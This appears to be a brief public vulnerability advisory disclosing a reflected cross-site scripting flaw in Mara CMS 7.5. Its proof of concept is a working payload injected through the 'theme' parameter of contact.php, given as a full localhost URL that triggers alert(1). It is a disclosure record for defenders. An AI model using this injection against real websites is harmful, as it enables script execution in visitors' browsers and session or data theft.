Mara CMS version 7.5 suffers from a cross site scripting vulnerability.
2c29fabdf542a48616db2f2c6d2c006381c9afe0e1ac4b58e4f2e7ce8d1e9860
==============================================================================
| # Title : Mara CMS 7.5 Cross Site Scripting |
| # Author : George Tsimpidas |
| # Tested on : Kali Linux (X64) |
| # Vendor : https://sourceforge.net/projects/maracms/ |
==============================================================================
PoC
[+] Use Payload : seven69387';alert(1)//154
Path : http://localhost/contact.php?theme=< inject payload here>
Full Poc :
http://localhost/contact.php?theme=seven69387';alert(1)//154